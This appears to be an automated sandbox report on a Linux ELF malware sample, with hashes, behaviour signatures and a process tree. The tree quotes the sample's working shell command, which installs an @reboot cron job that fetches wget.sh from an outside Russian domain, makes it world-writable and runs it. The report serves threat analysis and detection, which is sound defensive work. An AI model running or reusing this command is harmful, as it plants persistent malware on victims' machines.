Analysis

  • max time kernel
    149s
  • max time network
    136s
  • platform
    ubuntu-22.04_amd64
  • resource
    ubuntu2204-amd64-20240611-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu2204-amd64-20240611-en, kernel:5.15.0-105-generic, locale:en-us, os:ubuntu-22.04-amd64, system
  • submitted
    28-10-2024 01:13

General

  • Target

    721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf

  • Size

    73KB

  • MD5

    47ee0b8842a526fc0c6ff94fe4ca2ad6

  • SHA1

    adf64c9ff9b8d9897fddc7e3014b9c5aea88b964

  • SHA256

    721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443

  • SHA512

    c4ff89dfd2609c7ae0dfa234855be1e0133e8af0bce3afed376135c370eec203ea32c45a1f1d23cbc713717efd36c860478efcfbd85377cd3d17d8051b8f8862

  • SSDEEP

    1536:BFEA/tr50yFqIWfWD7LnaItWpOIfFkDFD:BFEAVZRWfWTnaVEIf0FD

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Changes its process name 1 IoCs
  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf
    /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf
    1⤵
    • Renames itself
    • Changes its process name
    • Reads runtime system information
    PID:1565
    • /bin/sh
      sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      2⤵
      • File and Directory Permissions Modification
      PID:1566
      • /usr/bin/crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        PID:1568
      • /usr/bin/crontab
        crontab -l
        3⤵
          PID:1569


    Downloads

    • /var/spool/cron/crontabs/tmp.FJlr1F

      Filesize

      306B

      MD5

      83171e3b993f7e5156610ec021956f99

      SHA1

      50d0c29250d3df506f2d6d45a6df96ca0164d4ce

      SHA256

      dd334f58ab4dcad925152e554fd9fc0a491f92e0c2ae992bdb2224be25a6cc4a

      SHA512

      34b475c5ea363b48102a902ea127d4f165f435cb85aa1b0dd3ade0cc92e57ff84ccf963dc0688302749992bdc4d834c10b1f75db6b913e07ed5cd814d637106f